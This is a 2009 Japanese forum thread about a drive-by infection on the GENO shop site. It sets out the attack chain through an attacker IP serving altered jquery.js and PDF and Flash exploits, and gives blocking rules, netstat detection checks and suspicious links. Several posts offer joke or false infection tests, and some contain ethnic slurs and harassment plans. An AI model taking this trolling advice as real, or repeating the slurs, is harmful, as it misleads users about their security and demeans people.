GENOなどのサイトでウイルス感染★6

中古PCとPCパーツの通販ショップGENO　URL略

【客の返品】GENOを語るスレ29【オク出品】
http://pc11.2ch.net/test/read.cgi/pc/1237696091/326-
326 名前：名無しさん[sage] 投稿日：2009/04/04(土) 10:43:40 0
GENOのHPにアクセスしようとしたら、Acrobat Plug-in が起動して
This operation is not allowed. と表示する。
２台試して、2台とも起きた。
もしかしてウィルスに感染してる？

前スレ
GENOなどのサイトでウイルス感染★5
http://tsushima.2ch.net/test/read.cgi/news/1239009596/

4/4　AM10時ごろ〜？からサイトにアクセスするだけで感染。
感染するとラトビアにトラフィックを飛ばします。
何を漁ってるのかは不明。

今の所は感染したら駆除できるソフトはない。
やっと一部のソフトがサイト踏んだ時に検知できるようになっただけ。
クリーンインストール推奨

・最新版のWindowsUpdateとadobeAcrobatとAdobe Flashであれば感染しない？
・ファイル作成を検出できたアンチウイルスソフトは４０のうち１０だけ。
・結論、管理もしてないようなＰＣでアクセスすれば余裕で感染する。

あちこちに短縮URLが貼られているようなので注意
発覚してないだけで他にも感染しているサイトがあるかも

ま

速い

(1)感染したWebページをひらく
↓
(2)感染したjsが、94.247.2.195の改変jquery.jsを実行
↓
(3)IP/UAで振り分け処理(Vistaは大丈夫そう？)
↓
(4)PDF/Flash起動。各種ウィルス本体をInternetTempに展開
↓
(5)bufferOverrunでウィルス本体の起動を試行

感染した場合
パスワードなどの個人情報が抜かれている可能性あり

いつものバックドア系ウイルスなんだけど、今回なんか変だな
・PDFファイルとかシステムファイルがなぜか増殖する
・メモリを馬鹿食いする
・再起動時にブルースクリーン

とりあえず、駆除せずに再起動したら帰ってこれないかもしれないな

対策

WindowsUpdate
PDFリーダーを最新にする　（AdobeReader　や Foxit Reader）
AdobeFlashを最新にする
94.247.2.195(94.247.[2-3].[0-255])への接続を遮断
Javascriptを切る
スレに貼られている怪しいリンクは開かない(GENO、juicyrock、短縮URL)

まだやってんの？

まだ続けるのかよｗ

1000 名前： カロライナジャスミン(山陰地方)[sage] 投稿日：2009/04/06(月) 23:06:05.16 ID:fWImSR6Y
1000ならｹﾞﾉ死亡

よくやった

実は俺の初1000ｹﾞﾄだったりするわけで……これまで取れなかったのに何でこんなとこで

ニュー速から戦死者が出たことは忘れない

やめません
直るまで

まだやってるのか
VISTAで踏みまくったが問題なかったからいいや
イメージもバックアップもとってあるから

これfoxitでもまずいの？

スレ３のアドレスください

おい、おまいらのせいでwindos update重いんだけど。

>>13
【注文0.1】Genoのサイトでウイルス感染…か？★3
http://tsushima.2ch.net/test/read.cgi/news/1238944195/

>>14
それどこか違うとこにもつながっている

前スレ>>987
コマンドプロンプト起動した覚えは？
conime.exeはコマンドプロンプトで日本語を表示する為の物なんだけど

今こそ国際電話（Q2）を復活させようぜ！

AVAST! 090406-0
antivir　7.01.03.19
これ対応してないよね？
なんかPC遅いんだよな、払いきれてない感じがする

トロイに壁紙をエロ画像に変えられたのはいい思い出

>>8
ﾜﾛﾀ

NoScript重いからYesScriptで代用してたのに
さすがに今回はNoを入れて凌ぐわ

NoScriptみたいに高機能じゃなくていいから
単純にホワイトリスト形式でスクリプト制限してくれるアドオン無いかな？

今家電で売ってるパソって全部vistaじゃんか
知識無いからメーカー品買うのに肝心のネット初心者が
vista使ってるんじゃ感染しないんジャマイカよ

こういう鯖管の行動
coderedやnimdaの時に沢山見たな
馬鹿すぎて最後は誰かのせいにして思考停止

ＰＣ初心者でもわかるように説明してほしい
どんなウイルス？

いちもつ

何でＧＥＮＯ【などの】なの？

各アンチウィルスの対応状況とか纏めてくれよ

踏んだからスキャンしたらノートン何も検知しなかったんだけど大丈夫かな

再起動しても大丈夫だったけどスタートアップのアプリが起動しなくなった

>>15
ありがとん

OSの再インストールおっ始めたがアプリのインストール考えると鬱になる
恨むぞGENO

検出できるソフト一覧
●a-squared 　　　　4.0.0.101
　2009.04.03 Trojan-Spy.Agent!IK
●Avast 　　　　　　4.8.1335.0
　2009.04.03 Win32:Daonol-L
●eSafe 　　　　　　7.0.17.0
　2009.04.02 Suspicious File
●GData 　　　　　　19
　2009.04.03 Win32:KillAV-KS
●Ikarus 　　 T3.1.1.49.0
　2009.04.03 Trojan-Spy.Agent
●Kaspersky 　　　　7.0.0.125
　2009.04.03 Backdoor.Win32.Agent.afhg
●McAfee+Artemis 5573
　2009.04.03 Generic!Artemis
●Prevx1 　　　　　V2
　2009.04.03 High Risk Cloaked Malware
●Sophos 4.40.0
　2009.04.03 Mal/Generic-A
●TrendMicro 8.700.0.1004
　2009.04.03 PAK_Generic.001

てかGENO側は何も対応してないの？
酷すぎだろ

>>33
ありがとうありがとう

>>23
自称・情報強者が引っかかるので問題ありません

>>33
Update AVG - AVI 270.11.43/ 2043
Added detection of new variant of Worm/Generic.XYQ, Worm/Generic.XYY, new variants of trojans Agent2.CWY, Downloader.Generic8.AFHP, Generic13.ULR, BackDoor.Generic11.GUZ.

April 6, 2009

規制依頼にリンクまとめ貼ってあったがあれ結構やばいだろ

会社のPCでアクセスしちまったよ・・・
明日には管理者にバレルんだろうなあ

>>33のはもう古いかも
誰かがvirustotalだかにもう一度うｐすれば検出できるソフト更新されてるかも

ここも同じ？
http://www.onlineplayer.jp/modules/topics/article.php?storyid=13413

>>17
当人ではないがコマンドプロントを起動してないが
conime.exeが動いてる

urlはおそらく踏んでないが、自信ない　　当方vista

トロジャン（笑）

>>16
それどういうこと？

>>43
すし食いてぇ

aviraも今は検出できるはずだな

会社のPCでアクセスとか救いようのねぇ馬鹿だな

>>42
同じ状態　当方Vista64

>>45

　　　　　　,-――――――-.
　　　　　 /　　　　　　　　　　 |
　　　　　/　　　　　　　　　　　|
　　　　 /　 　　　　　　　　　　 |
　　　　l"ジェンキン寿司　　　l
　　 ,､_lー-―――――‐--、/l
　　 i ﾄ､ﾐﾐ　,r‐- ､｀`'ニ=‐、.彡ﾘ.
　　 ヾ,iﾊ゛.´ _,,､_ 　i.;　_,.　｀ 彡'i)
　　　 ｀､j,'　 `ﾟ''´:.ﾉ i::<･ゝ) .ﾊン 　　　　へいおまち！
　　　　　i, 　 ｀ ,､/　i_　｀`　,r'
　　　,r〃'i　 ,r'ヽ、 _,〉　　/.
　　 /i:ﾄ､;;i, 　ﾐ=_‐_-, 'i　/ヽ__　　　　　　　　　∬∫
r-‐'´i::::ﾊ;;ヾ、‐‐-､　 ノ´/i:::'i｀i‐- ､_　　　　|￣￣￣|
::i' .l:i 'i::::i ヾ;;`‐---‐'i':/ i､ 'i::!　i::::i　｀　　　 |二茶二|
:i'　i:|　!:::l _,r.､;;;;;,r''´ヽi. ll::i　i::i　l:::'i　　　　 ヾﾆﾆﾆ.ﾉ

>>27
一応これと他に楽天の店舗でやられたらしき所がある。
http://pc11.2ch.net/test/read.cgi/sec/1224511070/690

再インスコめんどくせぇぇぇ

つうか情弱じゃなければ通常、HijackThisあたりで確認すんだろ
processesや、 Protocol、stylesheet、Serviceなんて見たことねえのか

＞94.247.2.195(94.247.[2-3].[0-255])への接続を遮断

これやりかたキボンヌ

>>50
あ、そっちのスレでいろいろと他のサイトでの同種ウィルス被害が寄せられてたのか。
ここのスレしかチェックしてなかったから全然知らなかったわ。

今日の疑心暗鬼スレ
めしうまｗｗｗｗ



まあ俺も踏んでるわけだが。

>>53
Adblock Plusで遮断するのなら
*/94.247.[2-3].[0-255]/*
を要素に追加。

GENOから商品発送のお手紙が届いてた
ちゃんと機能してて安心した

ＧＥＮＯの事は知ってたのに
検索して一番上にあったのを何も考えずに踏んでしまった
conime.exeが動いてたらアウトなの？

ウイルスキラーはよせいやああああああああああああああああ

普通にページ復活してて謝罪が一切見あたらないんだけどどういうこと？

>>40
aviraに送ったpdfファイルの検体上げてみたら2個しか対応してないみたいだぜ。
F-Secure: Exploit.Win32.Pidief.aog
Kaspersky: Exploit.Win32.Pidief.aog

>>33
NOD32はダメか・・・
NODの時代も終わりかな

なんか削除議論でケンカしてるぞｗ

http://qb5.2ch.net/test/read.cgi/sec2chd/1238968073/

あれれ？またメンテナンス中になっちゃってるｗ
>>60 50文字ぐらいでなんか右あたりに小さく書いてあったよ

よく分からないんだがgenoのサイトにさえ行かなきゃ良いんのかな？

>>61
それでいいのか、おれもやってみる

現在の更新の情報
合計時間： 1:06

- Vps： 更新されました
(前のバージョン： 090405-1, 更新後のバージョン： 090406-0)

サーバー： download975.avast.com (74.54.138.226)
ダウンロード ファイル： 5 (27.92 KB)
ダウンロード時間： 3 s

>>65
芸能事務所の研音がやってるネット通販サイトや
楽天の特定のショップなんかでも
同じウィルスに反応したって書き込みがセキュリティ板のスレにあった位なんで、
geno以外のサイトでも危ない可能性も十分にある。

>>42
>>48
名前はいくらでも偽装出来るからなぁ
プログラムの置いてある場所を確認すればいいかも

よく考えたらエロ動画とｱﾆﾗｼﾞしか持ってないから、どうでもいいや

Antivirus Software NOD32
Update info
Update 3989 (20090406)　2009-04-06 12:03

INF/Autorun, Win32/Adware.InternetAntivirus (5), Win32/Adware.MSAntispyware2009 (2),
Win32/Adware.SystemSecurity, Win32/Adware.Virtumonde (2), Win32/Agent.PEH (3),
Win32/Agent.PEI, Win32/Agent.PEJ, Win32/Agent.PEK (2), Win32/AutoRun.FlyStudio.FO (2),
Win32/BHO.NNU (2), Win32/Cimag.AA, Win32/Delf.OEY (3), Win32/DNSChanger,
Win32/FlyStudio.NIX, Win32/FlyStudio.NIY (2), Win32/Hupigon.NNE, Win32/Olmarik.FT (6),
Win32/Prosti.NBZ (2), Win32/PSW.LdPinch.NKR, Win32/PSW.Lineage.NHH,
Win32/PSW.OnLineGames.NMP (3), Win32/PSW.OnLineGames.NMY (3),
Win32/PSW.OnLineGames.NNU (4), Win32/PSW.OnLineGames.ODJ,
Win32/PSW.OnLineGames.XTT (2), Win32/Rootkit.Agent.NKR (5),
Win32/Spy.Zbot.NW, Win32/TrojanClicker.Delf.NDJ, Win32/TrojanClicker.Delf.NDK,
Win32/TrojanClicker.Delf.NDR (3), Win32/TrojanClicker.Delf.NGQ (2),
Win32/TrojanClicker.Delf.NGR (6), Win32/TrojanDownloader.Agent.OXU (2),
Win32/TrojanDownloader.Agent.OYF (3), Win32/TrojanDownloader.Agent.OYW,
Win32/TrojanDownloader.Delf.OSA (2), Win32/TrojanDownloader.Delf.OSB,
Win32/TrojanDownloader.FakeAlert.ABE, Win32/TrojanDownloader.FakeAlert.ABF (3),
Win32/TrojanDownloader.Small.ONY (2), Win32/TrojanDownloader.Zlob.CZG,
Win32/TrojanDownloader.Zlob.CZK, Win32/TrojanDropper.Agent.NXQ,
Win32/TrojanProxy.Small.NDR (2), Win32/VB.ND, Win32/Wigon.KA


対応してるのか対応してないのか多すぎてよく分かんないや

conime.exeはデフォルトで起動してるから大丈夫だよ




たぶん

ふひー　
この頃中古パソコン通販サイトを巡回してたから心配だったけど感染してなかったぜ
感染したらでる症状は無いし　糞マカフィーでウイルススキャンもした

Process Explorer置いとく
http://technet.microsoft.com/en-us/sysinternals/bb896653.aspx

さくっと検査ツール書いてみた。
実行ファイルだけだと怪しいのでソースコードも入れといたので。

http://www.vipper.org/vip1173341.zip.html

もし感染してHDDが壊れたりしたらたまらん
HDDにリカバリ機能が埋め込まれているタイプだ　どのURLもふめん

Adobeのﾒｰﾗｰみたいのが立ち上がってたんだが
もう手遅れ？

NoScript最強伝説

うんこ

>>75
おつ

踏むと具体的にどんな被害が出るの？

当方vista、該当URL未踏、conime.exe動いてるけど問題無し

たぶん

ウイルスとか感染経験ないからよくわかんないんだけど
HDDってウイルスで物理的に壊されるってあるの？

>>69
system32にあるみたい
問題なさそうですね

hostsファイルいじりたい人におすすめ
Hosts Manager
http://blocklistpro.com/download-center/biss-hosts-manager/

そうか、Vistaでconime.exeは平気なのか
元々未踏だけど良かった良かった

たぶん

>>46
そうなのか
試しにスキャンしてみるか

>>83
もともと壊れかけてたHDDに
ウィルスによってガリガリ書き込まれて壊れるなんていう可能性もゼロではない。

>>75
まだ確かめてないけど乙

http://www.nicovideo.jp/watch/sm6667873
まとめ動画

＞株式会社GENO（ジェノ）は常にお客様の立場で考え

ここでジェネオンがウイルス感染すればいいのに

>>90
怖くて踏めん　誰か踏んでくれ

他のパーツ＆ジャンクショップは
genoの人気に嫉妬してるなw

antivir　7.01.03.20
これか、またスキャンしてくるか

南朝鮮人の犯行なのか

お詫びはあったの？

よく考えてみたらスレ内でも末尾にｊｐｇが付いてないURLなんか
踏まないようにしてるから現時点では感染はしてないだろうな・・

>>93
羹に懲りて膾を吹くだな

>>93
ニコニコ

サーバーメンテ中に踏んで、１回電源も落としたけど
特にそれっぽい症状今のところないな。
試しにIEも使ってみたけど、エラーふいたりしないし。

再起動して帰ってこれたって事は感染してないって事だな

>>98
末尾は全く関係ない
jpgだろうがzipだろうが偽装し放題だ

イヤガラセと仕返しのために、
genoウイルス　で、いろんなサイトで
検索しまくろう。

グーグルの、
「急上昇キーワード」
にのせてしまおう　

>>17
XPなんだがコマンドプロンプト開いた覚えはないなあ
PC起動するのが怖くなってきた。
CPUは何もしていない状態で5%ちょっと。

>>95
それで対応した

>>93
普通の動画ページだった。関係ないっぽいけどね

【維新政党・新風】弁士、韓国人に襲われる
カテゴリ 政治 での前日マイリスト順位：圏外 ( 過去最高：圏外 ) 【ランキング推移を確認】

youtubeから。この朝鮮人は「韓国人はゴミ」という発言にファビョったみたいです。本当にゴミと言ったのか火病の妄想なのかはさだかではありませんが、
2:12に「おどんりゃ韓国人なめとったら殺すぞ」と発言しています。
さて、日本の法律で罰せられるのはどちらなのでしょうか？追記：マイリス支援ありがとうございます。皆さんに大変感謝しております。
他の方の動画はどうやら消されてしまったみたいです…。
※そういえば、ブラック軽部さんがよく「ゴミはゴミ箱に！朝鮮人は朝鮮半島に！」と言ってますね^^似たような物です

って内容

>>93
維新政党・新風、弁士の「韓国人はゴミ発言」に
在日韓国人がキレて「暴行」するニコニコ動画

>>99
一度も踏んでないけど　でもやっぱり怖い　一度も踏んでないから怖い

>>105
自分もプロセス数がいつもより多いと怖くなる事があるよ
system32にあるようなら心配いらないと思う。

>>102
今回のやつも再起動したら帰ってこれないタイプ？
そうとは知らず、寝て起きてから対応すっか。って電源切ったわあぶねえｗ

挿入っちゃった？

Acrobat入れてなかった・・・
スキャンした時間無駄だった

今の所なんの症状もでててててないし　感染したらの条件にもおあてはまらなないけでお　再起動するのが怖い

またもやavast先生大勝利！

＞感染した場合
＞・再起動時にブルースクリーン

＞とりあえず、駆除せずに再起動したら帰ってこれないかもしれないな

げのは何か対策したの？

KingSoftまだなんですか

　　　／＿_.）)ﾉヽ
　　 .|ミ.l GENO._i.）
　 （＾'ﾐ/.´・ .〈・ ﾘ
　　.しi 　　r､_） | 　ウィルスはわしが育てた
　　　 |　 `ﾆﾆ' /
　　　ﾉ　`ｰ―i´

してない

ジェノサイトウィルス感染病はもう治ったんかいな

ノートンで検出できる？

最近、何にも使ってないのにスタートメニューにメモ帳とペイントがあるんだけど何だろか？

>>110
取り敢えずどのサイトも信用できないからこの騒動おさまるまでPCはiPod充電だけに使うことにするよ。

まぁ、何回も再起動しても普通に起動するから大丈夫だよな。IE落ちたりもしないし。
安心して寝れるわ。ありがとう

ああ・・
Javascript切ってれば大丈夫なのか
火狐で良かったわ
zipと思って踏んだら罠だったってのが我ながら情けない限りだが

セキュリティソフトはこういうときにサクっと対応するほうが
ＴＶでＣＭするより宣伝効果ありそうなもんだが
いや、ないな、ないわ

>>125
火狐なら感染しないの？

AVG今回の対応遅かったな
P2Pに出回るウィルスには強いから今後も使い続けるけど

AVGはまだダメって本スレにかいてある・・・
怖いよ

よくわからんけどこえー
しばらく画像スレにはいけないな

AntiVir対応きた？
またスキャンするか

毎日GENOと電脳バイオーを見るのが日課だけどウイルスになんて感染しなかったぞ？？
Sleipnir2.xでIE8コンポ使用、avast!とPCtoolsを使ってる

あれだけニュー速騒いだくせにTOPの隅っこで謝罪とか笑える

GENOのサイトが鯖メンテ中になってるな
昨日は実験用の仮想マシンで踏んだらAvastが反応したけど

//94.247.2.195/news/?id=10&踏んだらZoneAlarmが反応
http://www3.uploda.org/uporg2146139.jpg

//94.247.2.195/news/?id=10踏んだら「"La.exe"をどうする？」と火狐。

感染しないよにする対策とかってないの？

>>127
Javascript切ってれば良い
だからスレイプニルでも対策できる

avastの検査
トレンドマイクロのオンラインスキャン完了

なんもでねぇな
つまんね

毎日GENO見てる俺涙目
昨日再起動した時開いても無いのに、
"表示中のpdfが閉じられようとしていますと"
とかでて？だったんだけど感染したか･･･

なんで情報強者のニュー速民がひっかかってるのかと思ったら、
zipスレで性欲に負けて何の疑いもなしにURLクリックしたZIP猿共なのか

2ch内では結構大きな騒ぎなのに
ニュースサイトが軒並み報じないのはなんでどうして？

メモリ使用量600MBって･･･

知名度が無いのが致命的

>>141
管理人もひっかかってたりして

>>136
ネットにつなぐな

ttp://fpdownload.macromedia.com/get/flashplayer/installers/archive/fp6_archive.zip

>>137
Javascriptって切ってて困ることってないか？

誤爆した。

誤爆ついでに>>146のリンク先のzip,Vb2009でウイルス反応でるんだけど誤検知？

>>141
邪推でもなんでもないが騒げるだけのネタに育ったら
報道しだすだろうよ

lightboxが動かない

>>147
ウィルスに感染するより困る状態か？

HIPS導入してる奴でトロイ送られたのは誰かいないのか？
AVで検知できなくても実行は阻止できただろ
つーかそんなあからさまなウイルスならヒューリスティックで検知できそうなもんだけど

NOD32を仮想のXPに入れ替えて本PCにカスペルスキー
買って入れようと思うのだがいくらぐらいするの？
あとネットから手軽にインスコできる？

>>151
ソーリー・・・・・

Javascript多用のサイトが多いのが困る

C:\Documents and Settings\村岡隆\My Documents\My Pictures\SEXY.JPG
↑
この画像開いてからちょっとＰＣが重くなったんだが・・・
ＪＰＧは大丈夫だよね？

>>149
対処方法が明らかでないから二次被害を避けて自重している……なんてわけないか

>>156
村岡Sexyウイルスか

>>156
村岡隆に怒られるぞお前

JPG仕込みって最近有名だよね

今回のウイルスの名前は村岡sexyウイルスで決定か

村岡隆登場

>>156
よう村岡隆

そんな名前のウィルスにパソコンつぶされるとかたまんねえよ！！！！！！！！

>>153
どうせなら最近下がり目のカスペより高検出で且つ安いGDATAにすればいいのに
NOD使ってるくらいだからあまり良いスペックじゃないのかもしれんけど

なかなかイイ名前だね

ここから村岡スレ

村岡sexyウィルスか
語呂もいいしこれでいいな

普通の人なら
交通事故起こしたら、
通報してけが人の搬送に協力したり、
発煙筒焚いたり、三角のやつ立てたりして、
他の車や人に危害を与えないような措置をとりますよね。

家から火が出たら通報しますね。
まー第一は自分のためだけど、
よそに飛び火させない配慮として、
すぐ119番しますよねー

そういうことしてないんだから、
類推判断でいえば、
「未必の故意」

だからＧｅｎｏ死ね

で、殺し方ｗ
genoウイルス　で、いろんなサイトで
検索しまくろう。

グーグルの、
「急上昇キーワード」
にのせてしまおう　

村岡と言えば

こういうのってブラウザ側が対処するもんだろ

>>156
何か嫌な名前だな

ttp://kickback.cc/upload/stored/up10577.jpg

>>156
名前晒してますよ

いいから早くセクムラウイルスの詳細よこせよ

白鯛は許さない

セロリンたんじゃアバスト重いお・・・

>>173
死ね

>>178
ありがとう　踏むところだった

もう村岡隆Sexyウィルスでいいよ

村岡隆ってmu-サソ？

>>156
VIPPER乙

>>170
うめしば

>>136
OSを入れない

また岡ちゃんがウイルスに掛かったのか

>>175
村岡隆はスケベ

ええええええ踏んでないのにすでにリンクの色かわっとル

>>176
それは村岡違いや

>>183
うんうんｗ

村岡隆セクシー(笑)

メモリが激しく動いてなければおｋ？

>>180
長い
村岡隆ウイルスsex　でいい

>>170
ケツ毛バーガーこと村岡万由子さんのことはもう許してやれよ

完全に村岡隆に乗っ取られた

タカ坊ときいて

とりあえずＡＶＧでウイルススキャンしとこ＾＾

セクシー村岡

Geno ウイルス、 PDF と exe には対応したようだ。

\dropper.pdf
[0] Archive type: PDF Stream
--> Object
[DETECTION] Contains recognition pattern of the EXP/Pidief.vtb exploit
[WARNING] The file was ignored!
\dropper.swf'
\malformed.jquery.js'
\monitor.bin'
\dropper.bin'
[DETECTION] Contains a recognition pattern of the (harmful) BDS/Agent.afid back-door program
[WARNING] The file was ignored!
\dropper.html'

村岡隆ってカイジかｗ

>>156
村岡隆さん初めますて＾＾

もうケツ毛タカシでいいよ

村岡隆って誰だよｗｗｗｗｗｗ俺しらねーしｗｗｗｗｗｗｗｗ

リカバリマンドイ

SEXY隆

プニルのnoscriptもどきのおかげで助かったｗ

>>202
まぁまぁ落ち着けよ隆

>>202
どうしたムラ？

ウイルスSEXY-TAKASI-

>>173
ソースチェッカーで開こうとしたらなぜか対象をブラウザで開くをクリックしてた
もう寝るか

>>202
よう村岡

>>202
村岡隆さん、名札ついてますって

サイト復活してたのね
これ、もう大丈夫なの？

しかし、謝罪一切なしかｗ

最後がjpgで専ブラでカーソル合わせただけでも感染？

ここの連中も釣られてやんのｗｗ

>>209
＞※このアドレスは危険URLのひとつです。
＞危険！mailtoストームを発見！ (1115)
＞<img src="http://strange.kurumi.ne.jp/bbs.cgi/pedo1">
ﾜﾛﾀ

「サーバーに一部不具合がございました。」

この程度かｗ

>>213
それはない

GENOはもう行っても大丈夫なのか？

>>213
なんとも無いみたい、が
安価にカーソル合わせたらＡＶＧが反応した

駄目

ウィルス撒き散らしながら商売致しますってか
なんかもうﾔｹｸｿだな

確かカーソル合わせただけでも駄目なんじゃなかったっけ？

タスクマネージャー開いてtaskmgr.exeがあったらアウト

>>219
怖いからlive2chのポップアップ機能変更しとこ

>>222
専ブラ使いこなせなくてつい最近アンインストールしててよかった

な、なんだってー

>>213
サムネが出てたらご愁傷様

社員共スレ潰し作業乙ｗ

ttp://www.geno.co.jp/4D/images/top/banner_owabi.gif

JavaScriptを無効にしていれば大丈夫だろうし、Adobe ReaderやFlash Playerを最新版にしてあれば問題なさそうだけどな。
でもJavaScriptなしのウェブってもう考えられない感じだし、面倒だけどこれからもマメにソフトをアップデートするしかないな。

>>223
Windowsフォルダ削除してくる＼(＾o＾)／

まさにGENO

俺は怪しいｊｐｇを専ブラで開くといつも
読み込むんだけど最後にデコードエラーと出て真っ赤になるぜ
これは大丈夫だろう

GENOの由来はジェノサイド　まちめきしな

>>213
マウスオーバーで画像を開く　にチェックいれて画像すれみてたら
以前カスぺが反応したことあるよ

だから今回は知らないが安全とはいえないのでは

同業者をジェノサイドするつもりがお客をジェノサイドｗ

デコードエラー＋画像キャッシュにトロイが見つかる

マウスオーバーで開く設定にしてるからだろ

avast入れてる人、他のソフト入れてないの？
ファイアウォール対策ソフトとか

かかったやつどれくらいいいんの

周りが騒いでるからとりあえずＴＯＰを閉鎖しておいて、
ほーむぺーじ作ってもらった会社に直してもらうまで放置なんじゃないかね

>>240
500人いたとして450人ぐらい感染

GENO側ではまだ原因も分からなければ対策も何もしてないっぽいから、
不安ならアクセスしないほうがいい。

不具合ありました
すまねで許されるの？

他の国だったら禁固5年か10万ドル以上の罰金確定なんだけど

firefoxでよかった

ノートンは無力だよなあ。
まったく役になっていないわあ。（´・ω・`）ｼｮﾎﾞｰﾝ

あと2週間で切れるから他社製品に切り替えるわ。

火狐なら平気なのか？

そっか…
画像プレビューポップアップを無効にしておこう

>>227
普通に写真画像とかが出ても偽装で実は混入してるとかあるのかな

Javaきってないと火狐でもアウト

カスペとAvast以外は全て無力だったぞ。どこに乗り換えるんだよ。

仕事用のPC感染した＼(＾o＾)／ﾏｼﾞﾃﾞ人生ｵﾜﾀ

線ブラでｊｐｇのサムネがでる設定でもアウトなのか？

寝る前に仮想PCで丸裸の状態で踏んでみるか

PDFとフラッシュの奴を最新のにするとするか・・・

IEコンポの専ブラはIEの設定によってはアウト

以前にも開いた瞬間にjaneが落ちて起動できなくなるjpgとかあった気がする
まぁこれからは何踏むとしてもそいつのIDやらそいつへのレスをよく見るんだな

>>239
avastと相性いいのがどうも見つからないんでMS任せ

>>251
こういう奴多いな、メシウマｗ

お前ら未だやって田野かよ

>>251
無茶しやがって・・・

64 名前： ハナズオウ(長崎県)[] 投稿日：2009/04/06(月) 13:09:08.77 [昼] ID:1LYDwTsT
http://sukima.vip2ch.com/up/sukima017731.jpg
http://sukima.vip2ch.com/up/sukima017732.jpg
http://sukima.vip2ch.com/up/sukima017733.jpg
http://sukima.vip2ch.com/up/sukima017734.jpg
http://www1.axfc.net/uploader/H/so/73918.zip

http://up2.viploader.net/pic2d/src/viploader2d548768.jpg
http://xurl.jp/j5n?uploader/Ne/so/49416.zip

全然関係ないけど、やっとこのパス分かった　基本過ぎて俺アホス

>>202
クソワロタｗｗｗｗｗｗｗ

genoをばんばんヤバリストに登録するだけｗ

今このスレみつけた
数時間前にしっかり踏んでた
オワタ

>>251
二番煎じ乙

>>251
なし仕事中にするんねｗ

>>708
IE→インターネットプロパティ→設定→ファイル表示でフォルダ開いて
94.247.2.195/jquery.jsがいるかどうかじゃないかなあ。

これって削除してもいいんですかね。

で、かかったとして
何がどうなるの？

ちょっとavastについて教えてほしいんだが
ログのれベルってあるけどウイルス検査とかでウイルス見つかったらログとるようにするにはどれに設定すればいいの？
それとjaneみたいな2chブラウザで開いてる画像とかもウイルスやスパイウェア検出してくれる？
してくれてない感じなんだけど

>>268
感染状態で再起動→ご冥福

楽天も感染してたんだろ・・・・
いつも楽天見てるオバチャンのせいに・・・・なんかしないぜ・・・・・^^

あああああああああああああああああああああ寝たくねぇえええええええええええええええええ
会社行きたくねえええええええええええええええええええええええええ

>>268
・PDFファイルとかシステムファイルがなぜか増殖する
・メモリを馬鹿食いする
・再起動時にブルースクリーン

>>261
下のは斧じゃないｗｗｗｗｗ

>>271
楽天もだめなの？　楽天で中古パソコンあさってた俺どうなるの？　今の所感染してないが

とりあえずNoScript導入した。
これいいわ

コレ結局GENOは不具合がありましたで済ませるつもりか？ｗ

>>272
その三つの症状はないがオンラインスキャンをブロックされているような動作が感じられるのはなぜだろう。。。

この隙に、掘り出し物をと思ってアクセスしたのに
相変わらずのゴミだらけでﾜﾛﾀ

マカフィーウイルスすきゃん　2件検出　2件隔離
これは大丈夫なのか・・？

>>274
楽天の一部らしい
どこかは知らん
大丈夫お前は踏んでねーよ

俺も踏んだけど結局何もなかった
重くなったからすぐブラウザ閉じたけど

>>278
皆やること同じだなｗ

>>280
一瞬顔面クレイジーになったけど安心した

これブラウザの脆弱性とは関係ないんだろ、だからどのブラウザ使っているかどうかは問題じゃない。
結局、使っているソフトはセキュリティパッチが出たらすぐアップデートできるよう注意し続けるしかないよ。
パッチ未適用でもアンチウイルスがカバーしてくれるかどうかに賭けてもしょうがないし。

GENOはどれだけ殉職者を増やすつもりだ
絶対に許さない(｀；ω；´)

>>270>>272
ありがとありがと

じゃあﾎﾞｸのPCが今かかってるのとは違うや

spybot走らせると途中でワトソン博士がうんたらかんたら言って
処理が止まっちゃうやつだから

ホワイトリスト方式でcookie受けるアドオンない？

感染確認するにはどうすりゃいい？

再起動

再起動しておかしなことにならなかったら平気なんだね
安心したからシコって寝よ

情弱共哀れｗｗｗｗｗｗｗｗ











とか言ってる俺も
間違ってzip偽装踏んじまったんだけどな
まあ、フラッシュはたまたま最新版だったし、何よりOperaでフラッシュはその時切ってたからマジ無問題

やっぱ情弱哀れｗｗｗｗｗｗｗｗｗｗｗｗ

netstat /a とかで感染わかるの？

>>269
http://www.iso-g.com/modules/xfsection/article.php?articleid=33
janeは知らんがlive2chならよく教えてくれるぞ

でもそうすると
犯人は朝鮮人？

このタイミングだし

被害はどれくらいなのかねえ

感染したらどうなるのか？については報告者によってまちまちなんだよね
とりあえずラトビアと通信してpdfやらswfを落として何か悪さをするらしい

http://tsushima.2ch.net/test/read.cgi/news/1238897231/572-
572 名前： 姫カンムリシャジン(北海道)[] 投稿日：2009/04/05(日) 17:30:38.90 ID:SJFT5u/E
genoのサイトを開くと以下のURLが呼ばれるんだが

　　94.247.2.195/news/?id=100　(IEの場合こっちが呼ばれる)
　　94.247.2.195/news/?id=101　(それ以外の場合こっちが呼ばれる)

うちの環境ではどちらを開いても以下のコードしか出てこない。

　　// No news...<script>
　　var t=new Date(1148027392000);document.cookie="miek=1; expires="+t.toGMTString()+"; path=/";
　　//</script>

ただcookieを書き込んでるだけ。よって何も起こらない。
しかしどうも前スレの報告によると、このURLにPDFやswfをダウンロードさせるコードが含まれてる場合もあるみたいなんだよな。
とりあえずうちでは攻撃が確認できないので、これ以上の解析は無理だ

>>288
とりあえずタスクマネージャー

>>291
踏んだ時点で不安は払拭されなくなるんだよなｗｗｗｗｗｗｗ
avastがマルウェア拒否したけど
やっぱ不安ｗｗｗｗｗｗｗｗｗｗｗｗｗ

>>269
時たま教えてくれるよ

>>288
maro zip zip oppai

をメモ帳に打ち込んで保存。コピペ可。
一度閉じて開いた時文字化けしてればキンタマ感染中

>>296
亜種が多いって事なのかな

カスペのオンラインスキャン

>>297
タスクマネージャ見たけど何があればアウトなの

NoScriptの許可リストに入れてるようなサイトが狙われるともう大変なことになるな

ESET(NOD32)はまだ対応してないくさいな。
PDF落としてきてスキャンしたんだがスルーだ。

メモリ一番食ってるのはashWevSvだけだった
ありがとう寝る

>>292
netstat -nb
cmd.exeが接続先「94.247.2.195」とかならアウト

* 8世紀 - ヴァイキングが進出。居留地のみ。
* 13世紀初めごろに、リヴォニア帯剣騎士団が領有を始める。
* 1629年 - リヴラント（スウェーデン）とクールラント（ポーランド）に分裂。
* 1730年 - リヴラントもクールラントも事実上ロシア帝国の支配下に。
* 1920年1月13日 - ロシア帝国から独立。
* 1940年8月5日 - ソ連に併合される。
* 1991年8月21日 - ソ連から独立を回復。
* 2004年5月1日 - 欧州連合 (EU) に加盟

今回の騒ぎで短縮URLがやばいってのがよーくわかった
いろんな人騙しやがってちくしょうめ

メモリとCPU一番食ってるのマカフィーだった

